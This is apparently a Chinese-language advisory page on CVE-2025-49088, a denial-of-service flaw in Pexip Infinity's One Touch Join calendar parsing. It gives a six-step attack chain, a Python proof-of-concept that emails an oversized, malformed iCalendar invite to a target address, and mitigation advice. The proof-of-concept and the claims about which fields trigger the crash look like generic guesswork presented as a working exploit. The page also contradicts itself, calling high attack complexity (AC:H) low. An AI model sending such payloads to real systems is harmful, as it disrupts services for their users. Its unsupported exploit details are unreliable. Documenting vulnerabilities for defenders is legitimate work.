CVE-2025-49088 Pexip Infinity OTJ服务输入验证不当导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-49088

漏洞类型

拒绝服务/输入验证不当

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Pexip Infinity

漏洞概述

CVE-2025-49088是Pexip Infinity视频会议平台中的一个中危安全漏洞。该漏洞存在于Pexip Infinity 32.0至37.1版本中，特别是使用One Touch Join (OTJ)功能进行Microsoft Teams SIP Guest Join的特定配置场景下。漏洞根源在于OTJ服务对输入数据的验证不充分，允许远程未认证攻击者通过发送特制的日历邀请（calendar invite）来触发目标系统的软件中止（software abort）。由于该漏洞的网络可达性（AV:N）和低攻击复杂度（AC:H）特性，攻击者可以在无需任何认证和用户交互的情况下发起攻击。最终攻击会导致Pexip Infinity服务中断，造成拒绝服务（DoS）状态，影响企业的视频会议正常进行。该漏洞的CVSS评分5.9分，属于中等严重程度，主要影响系统的可用性。

技术细节

该漏洞的技术根源在于Pexip Infinity的OTJ（One Touch Join）服务模块对日历邀请数据的输入验证机制存在缺陷。在Teams SIP Guest Join功能中，系统需要解析和处理外部日历邀请以实现快速加入会议。攻击者构造包含特殊格式或恶意payload的日历邀请（iCalendar格式），当OTJ服务解析这些特制数据时，由于缺乏充分的输入验证和边界检查，导致系统触发异常处理流程，最终引发软件中止。具体攻击流程为：攻击者首先获取或推断目标Pexip Infinity系统的OTJ服务地址，然后构造包含异常数据的日历邀请并发送给目标系统。OTJ服务在解析iCalendar数据时，异常数据触发内部错误处理逻辑，导致服务进程异常终止。由于Pexip Infinity通常部署为集群架构，单点故障可能影响整体服务的可用性。漏洞利用的关键在于日历邀请的特定字段（如SUMMARY、DESCRIPTION、ATTENDEE等）中包含的特殊字符或格式错误数据。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Pexip Infinity部署环境，确认OTJ服务可访问，并收集目标系统的邮件接收地址或SIP网关配置信息

STEP 2

步骤2: 构造恶意日历邀请

攻击者构造包含特制payload的iCalendar格式日历邀请，在SUMMARY、DESCRIPTION等字段中注入超长字符串、特殊字符或格式错误数据，以触发输入验证缺陷

STEP 3

步骤3: 发送恶意邀请

通过邮件系统或直接SIP消息将恶意日历邀请发送给目标Pexip Infinity系统的OTJ服务端口，绕过基础过滤机制

STEP 4

步骤4: 触发漏洞

OTJ服务解析iCalendar数据时，由于缺乏充分的输入验证和边界检查，恶意payload触发内部异常处理逻辑

STEP 5

步骤5: 服务中止

异常处理失败导致OTJ服务进程崩溃或软件中止，服务无法响应正常请求，造成视频会议服务中断

STEP 6

步骤6: DoS效果达成

目标系统的One Touch Join功能失效，用户无法通过OTJ快速加入会议，需要手动重新配置和重启服务才能恢复

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2025-49088 PoC - Pexip Infinity OTJ Service DoS This PoC demonstrates sending a crafted calendar invite to trigger improper input validation in Pexip Infinity OTJ service. Note: This is for educational and authorized testing purposes only. """ import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from datetime import datetime, timedelta def create_crafted_calendar_invite(): """Generate a crafted iCalendar invite with malicious payload""" # Start time: tomorrow start_time = datetime.now() + timedelta(days=1) end_time = start_time + timedelta(hours=1) # Format for iCalendar (YYYYMMDDTHHMMSSZ) dtstart = start_time.strftime('%Y%m%dT%H%M%S') dtend = end_time.strftime('%Y%m%dT%H%M%S') uid = f"exploit-{datetime.now().strftime('%Y%m%d%H%M%S')}@attacker.com" # Crafted iCalendar with malicious payload in SUMMARY field # This payload exploits improper input validation crafted_payload = "A" * 10000 + "\n" + "B" * 10000 # Oversized field ical_content = f"""BEGIN:VCALENDAR VERSION:2.0 PRODID:-//Pexip//OTJ Exploit//EN METHOD:REQUEST BEGIN:VEVENT UID:{uid} DTSTAMP:{datetime.now().strftime('%Y%m%dT%H%M%S')}Z DTSTART:{dtstart} DTEND:{dtend} SUMMARY:{crafted_payload} DESCRIPTION:Test meeting with crafted payload for CVE-2025-49088\n\n\x00\x01\x02 ORGANIZER:mailto:[email protected] ATTENDEE;CN=Attacker;ROLE=REQ-PARTICIPANT:mailto:[email protected] END:VEVENT END:VCALENDAR""" return ical_content def send_crafted_invite(target_email, smtp_server='localhost', smtp_port=25): """Send the crafted calendar invite via email""" ical_content = create_crafted_calendar_invite() msg = MIMEMultipart('mixed') msg['From'] = '[email protected]' msg['To'] = target_email msg['Subject'] = 'Meeting Invitation - Urgent Action Required' # Attach the crafted iCalendar calendar_part = MIMEText(ical_content, 'calendar', 'utf-8') calendar_part.add_header('Content-Disposition', 'attachment', filename='meeting.ics') msg.attach(calendar_part) try: with smtplib.SMTP(smtp_server, smtp_port) as server: server.send_message(msg) print(f"[+] Crafted calendar invite sent to {target_email}") return True except Exception as e: print(f"[-] Failed to send: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_email> [smtp_server] [smtp_port]") sys.exit(1) target = sys.argv[1] smtp = sys.argv[2] if len(sys.argv) > 2 else 'localhost' port = int(sys.argv[3]) if len(sys.argv) > 3 else 25 send_crafted_invite(target, smtp, port)

影响范围

Pexip Infinity 32.0

Pexip Infinity 33.0

Pexip Infinity 34.0

Pexip Infinity 35.0

Pexip Infinity 36.0

Pexip Infinity 37.0

Pexip Infinity 37.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在邮件网关或防火墙层面过滤包含超长字段或特殊字符的iCalendar邮件；2) 暂时禁用OTJ的自动日历解析功能，改为手动处理日历邀请；3) 启用Pexip Infinity的日志审计功能，监控OTJ服务异常；4) 考虑在高可用架构中部署冗余节点以提高抗DoS能力；5) 与Pexip官方支持团队联系获取具体的临时缓解指南。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-49088
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-49088
3 Details https://www.cvedetails.com/cve/CVE-2025-49088/
4 VulDB https://vuldb.com/cve/CVE-2025-49088
5 Link https://docs.pexip.com/admin/security_bulletins.htm